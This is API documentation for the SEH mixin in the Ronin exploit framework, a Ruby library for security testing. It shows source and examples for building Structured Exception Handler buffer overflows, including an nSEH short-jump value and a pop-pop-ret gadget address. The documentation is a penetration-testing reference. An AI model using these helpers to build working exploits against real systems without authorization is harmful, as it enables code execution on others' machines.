Module: Ronin::Exploits::Mixins::SEH

Includes:

Binary, NOPS, Text

Included in:

SEHOverflow

Defined in:

lib/ronin/exploits/mixins/seh.rb

Overview

Methods for building Structured Exception Handler (SEH) buffer overflows.

Example

include Mixins::SEH

def build
  nseh = 0x06eb9090 # short jump 6 bytes
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)
  # ...
end

If you want more control over how the buffer is constructed:

include Mixins::SEH

def build
  nseh = 0x06eb9090 # short jump 6 bytes
  seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

  buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload
  # ...
end

Since:

• 1.0.0

Constant Summary

Constants included from NOPS

NOPS::NOPS

Instance Method Summary

• #seh_buffer_overflow(length:, nops: nil, payload:, nseh:, seh:) ⇒ String

  Builds a SEH buffer overflow.

• #seh_record(nseh, seh) ⇒ String

  Creates a SEH record.

Methods included from NOPS

#nop, #nops, #perform_validate

Methods included from Binary

#pack, #perform_validate, #platform

Methods included from Text

#junk

Instance Method Details

#seh_buffer_overflow(length:, nops: nil, payload:, nseh:, seh:) ⇒ String

Builds a SEH buffer overflow.

Examples:

nseh = 0x06eb9090 # short jump 6 bytes
seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

buffer = seh_buffer_overflow(length: 1024, nops: 16, payload: payload, nseh: nseh, seh: seh)

Parameters:

• length (Integer) —

  The desired length of the buffer.

• nops (Integer, nil) (defaults to: nil) —

  The optional amount of NOPs to add before the payload.

• payload (#to_s) —

  The payload to add to the buffer.

• nseh (Integer) —

  The address to the next SEH record.

• seh (Integer) —

  The address to the SEH exception handler for the record that we want to call.

Returns:

• (String) —

  The SEH buffer overflow.

Since:

• 1.0.0

# File 'lib/ronin/exploits/mixins/seh.rb', line 121

def seh_buffer_overflow(length: , nops: nil, payload: , nseh: , seh: )
  payload = payload.to_s
  payload = self.nops(nops) + payload if nops

  seh_record = self.seh_record(nseh,seh)

  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << junk(length - payload.bytesize - seh_record.bytesize)
  buffer << payload
  buffer << seh_record

  return buffer
end

#seh_record(nseh, seh) ⇒ String

Creates a SEH record.

Examples:

nseh = 0x06eb9090 # short jump 6 bytes
seh  = 0x1001ae86 # pop pop ret 1001AE86 SSLEAY32.DLL

buffer = junk(1024) + seh_record(nseh,seh) + nops(16) + payload

Parameters:

• nseh (Integer) —

  The address to the next SEH record.

• seh (Integer) —

  The address to the SEH exception handler for the record that we want to call.

Returns:

• (String) —

  The SEH record.

Since:

• 1.0.0

# File 'lib/ronin/exploits/mixins/seh.rb', line 87

def seh_record(nseh,seh)
  pack(:machine_word,nseh) + pack(:machine_word,seh)
end